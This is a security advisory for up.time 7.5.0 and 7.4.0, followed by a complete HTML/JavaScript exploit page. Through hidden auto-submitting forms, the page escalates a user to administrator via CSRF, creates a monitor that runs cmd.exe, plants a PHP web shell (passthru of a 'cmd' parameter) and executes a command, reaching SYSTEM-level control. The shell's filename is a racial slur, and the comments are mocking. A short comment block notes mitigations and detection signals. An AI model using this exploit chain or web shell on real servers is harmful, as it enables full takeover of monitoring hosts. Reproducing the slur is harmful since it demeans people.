up.time 7.5.0 Upload And Execute File Exploit
Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
Summary: The next generation of IT monitoring software.
Desc: up.time suffers from arbitrary command execution.
Attackers can exploit this issue through the monitor service
feature by adding a command, with the respective arguments, to a given
binary for execution. Combined with CSRF, privilege
escalation, arbitrary text file creation, and renaming that
file (to .php, for example) in an arbitrary location, this allows executing
system commands with SYSTEM privileges.
Tested on: Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
Vulnerability discovered by Ewerson 'Crash' Guimaraes
@zeroscience
Advisory ID: ZSL-2015-5254
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php
29.07.2015
--
<html>
<head>
<title>Uptime Exploit</title>
</head>
<body onload="runme();">
<!-- Login -->
<form name="login" action="http://127.0.0.1:9999/index.php" method="POST" target="frame0">
<input type="hidden" name="username" value="sample" />
<input type="hidden" name="password" value="123456" />
</form>
<!-- Escalate privileges -->
<form name="privadm" action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=2" method="POST" target="frame1">
<input type="hidden" name="operation" value="submit" />
<input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
<input type="hidden" name="username" value="sample" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="passwordConfirm" value="123456" />
<input type="hidden" name="firstname" value="Sample" />
<input type="hidden" name="lastname" value="User" />
<input type="hidden" name="location" value="" />
<input type="hidden" name="emailaddress" value="" />
<input type="hidden" name="emailtimeperiodid" value="1" />
<input type="hidden" name="phonenumber" value="" />
<input type="hidden" name="phonenumbertimeperiodid" value="1" />
<input type="hidden" name="windowshost" value="" />
<input type="hidden" name="windowsworkgroup" value="" />
<input type="hidden" name="windowspopuptimeperiodid" value="1" />
<input type="hidden" name="landingpage" value="MyPortal" />
<input type="hidden" name="isonvacation" value="0" />
<input type="hidden" name="receivealerts" value="0" />
<input type="hidden" name="activexgraphs" value="0" />
<input type="hidden" name="newuser" value="on" />
<input type="hidden" name="newuser" value="1" />
<input type="hidden" name="userroleid" value="1" />
<input type="hidden" name="usergroupid[]" value="1" />
</form>
<!-- Log-off to refresh permission -->
<form name="logoff" action="http://127.0.0.1:9999/main.php" method="POST" target="frame2">
<input type="hidden" name="logout" value="1" />
</form>
<!-- Login with escalated user -->
<form name="login2" action="http://127.0.0.1:9999/index.php?loggedout" method="POST" target="frame3">
<input type="hidden" name="username" value="sample" />
<input type="hidden" name="password" value="123456" />
</form>
<!-- Creating Monitor to rename php shell -->
<form name="createmonitor" action="http://127.0.0.1:9999/main.php?section=ERDCInstance&subsection=add" method="POST" target="frame4">
<input type="hidden" name="initialERDCId" value="20" />
<input type="hidden" name="target" value="1" />
<input type="hidden" name="targetType" value="systemList" />
<input type="hidden" name="systemList" value="1" />
<input type="hidden" name="serviceGroupList" value="-10" />
<input type="hidden" name="initialMode" value="standard" />
<input type="hidden" name="erdcName" value="Exploit" />
<input type="hidden" name="erdcInitialName" value="" />
<input type="hidden" name="erdcDescription" value="Exploit" />
<input type="hidden" name="hostButton" value="system" />
<input type="hidden" name="erdc_id" value="20" />
<input type="hidden" name="forceReload" value="0" />
<input type="hidden" name="operation" value="standard" />
<input type="hidden" name="erdc_instance_id" value="" />
<input type="hidden" name="label_[184]" value="Script Name" />
<input type="hidden" name="value_[184]" value="c:\windows\system32\cmd.exe" />
<input type="hidden" name="id_[184]" value="process" />
<input type="hidden" name="name_[process]" value="184" />
<input type="hidden" name="units_[184]" value="" />
<input type="hidden" name="guiBasic_[184]" value="1" />
<input type="hidden" name="inputType_[184]" value="GUIString" />
<input type="hidden" name="screenOrder_[184]" value="1" />
<input type="hidden" name="parmType_[184]" value="1" />
<input type="hidden" name="label_[185]" value="Arguments" />
<input type="hidden" name="value_[185]" value=" /C ren "C:\Program Files\uptime software\uptime\GUI\wizards\nigga.txt" "nigga.php" " />
<input type="hidden" name="id_[185]" value="args" />
<input type="hidden" name="name_[args]" value="185" />
<input type="hidden" name="units_[185]" value="" />
<input type="hidden" name="guiBasic_[185]" value="1" />
<input type="hidden" name="inputType_[185]" value="GUIString" />
<input type="hidden" name="screenOrder_[185]" value="2" />
<input type="hidden" name="parmType_[185]" value="1" />
<input type="hidden" name="label_[187]" value="Output" />
<input type="hidden" name="can_retain_[187]" value="false" />
<input type="hidden" name="comparisonWarn_[187]" value="-1" />
<input type="hidden" name="comparison_[187]" value="-1" />
<input type="hidden" name="id_[187]" value="value_critical_output" />
<input type="hidden" name="name_[output]" value="187" />
<input type="hidden" name="units_[187]" value="" />
<input type="hidden" name="guiBasic_[187]" value="1" />
<input type="hidden" name="inputType_[187]" value="GUIString" />
<input type="hidden" name="screenOrder_[187]" value="4" />
<input type="hidden" name="parmType_[187]" value="2" />
<input type="hidden" name="label_[189]" value="Response time" />
<input type="hidden" name="can_retain_[189]" value="false" />
<input type="hidden" name="comparisonWarn_[189]" value="-1" />
<input type="hidden" name="comparison_[189]" value="-1" />
<input type="hidden" name="id_[189]" value="value_critical_timer" />
<input type="hidden" name="name_[timer]" value="189" />
<input type="hidden" name="units_[189]" value="ms" />
<input type="hidden" name="guiBasic_[189]" value="0" />
<input type="hidden" name="inputType_[189]" value="GUIInteger" />
<input type="hidden" name="screenOrder_[189]" value="6" />
<input type="hidden" name="parmType_[189]" value="2" />
<input type="hidden" name="timing_[erdc_instance_monitored]" value="1" />
<input type="hidden" name="timing_[timeout]" value="60" />
<input type="hidden" name="timing_[check_interval]" value="10" />
<input type="hidden" name="timing_[recheck_interval]" value="1" />
<input type="hidden" name="timing_[max_rechecks]" value="3" />
<input type="hidden" name="alerting_[notification]" value="1" />
<input type="hidden" name="alerting_[alert_interval]" value="120" />
<input type="hidden" name="alerting_[alert_on_critical]" value="1" />
<input type="hidden" name="alerting_[alert_on_warning]" value="1" />
<input type="hidden" name="alerting_[alert_on_recovery]" value="1" />
<input type="hidden" name="alerting_[alert_on_unknown]" value="1" />
<input type="hidden" name="time_period_id" value="1" />
<input type="hidden" name="pageFinish" value="Finish" />
<input type="hidden" name="pageContinue" value="Continue..." />
<input type="hidden" name="isWizard" value="1" />
<input type="hidden" name="wizardPage" value="2" />
<input type="hidden" name="wizardNumPages" value="2" />
<input type="hidden" name="wizardTask" value="pageFinish" />
<input type="hidden" name="visitedPage[1]" value="1" />
<input type="hidden" name="visitedPage[2]" value="1" />
</form>
<!-- Uploading php shell txt format -->
<form name="uploadshell" action="http://127.0.0.1:9999/wizards/post2file.php" method="POST" target="frame5">
<input type="hidden" name="file_name" value="nigga.txt" />
<input type="hidden" name="script" value="<? passthru($_GET['cmd']); ?>" />
</form>
<!-- Run command to rename php shell -->
<form name="run" action="http://127.0.0.1:9999/main.php" method="POST" target="frame6">
<input type="hidden" name="section" value="RunERDCInstance" />
<input type="hidden" name="subsection" value="view" />
<input type="hidden" name="id" value="65535" />
<input type="hidden" name="name" value="Exploit" />
</form>
<!-- Executing basic command -->
<form name="exploit" action="http://127.0.0.1:9999/wizards/nigga.php" METHOD="GET" target="frame7">
<input type="hidden" name="cmd" value="whoami" />
</form>
<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<iframe name="frame2"></iframe>
<iframe name="frame3"></iframe>
<iframe name="frame4"></iframe>
<iframe name="frame5"></iframe>
<iframe name="frame6"></iframe>
<iframe name="frame7"></iframe>
<script>
// Entry point, invoked from <body onload>.
// Drives the hidden forms above in a fixed order: each form is submitted into
// its own named iframe, and the next submit is bound to that iframe's onload so
// the steps run one after another. Every target URL is hard-coded to
// http://127.0.0.1:9999 and the credentials are fixed values in the forms.
// Defender's view: none of the forms carries a per-session anti-CSRF token,
// which is what lets a cross-origin page drive these endpoints. Mitigations on
// the server side are a token check on every state-changing request, SameSite
// session cookies, and an authorization check on the user-edit and monitor-add
// actions instead of trusting the submitted role fields. In web/server logs, a
// monitor definition whose script path is cmd.exe, or a post2file.php write
// under wizards/, is a reasonable detection signal for this chain.
function runme()
{
document.login.submit();
// Each nested handler fires once the previous step's iframe has finished loading.
document.getElementsByTagName("iframe")[0].onload = function()
//document.write("Login....")
{
document.privadm.submit();
document.getElementsByTagName("iframe")[1].onload = function()
//document.write("Mutating to admin uahsuasuas");
{
document.logoff.submit();
document.getElementsByTagName("iframe")[2].onload = function()
//document.write("Refreshing perms...");
{
document.login2.submit();
document.getElementsByTagName("iframe")[3].onload = function()
//document.write("Login again...Keep Calm....");
{
document.createmonitor.submit();
document.getElementsByTagName("iframe")[4].onload = function()
//document.write("Creating F*cking monitor");
{
document.uploadshell.submit();
document.getElementsByTagName("iframe")[5].onload = function()
//document.write("Uploading webshell. Muaaaaa! Muaaaaa!!");
{
document.run.submit();
document.getElementsByTagName("iframe")[6].onload = function()
//document.write("Trick to shell... come on....");
{
document.exploit.submit();
document.getElementsByTagName("iframe")[7].onload = function()
alert('Pwned!!!!!!!!!!!!!!!!!!!!!!')
}
}
}
}
}
}
}
}
</script>
</body>
</html> |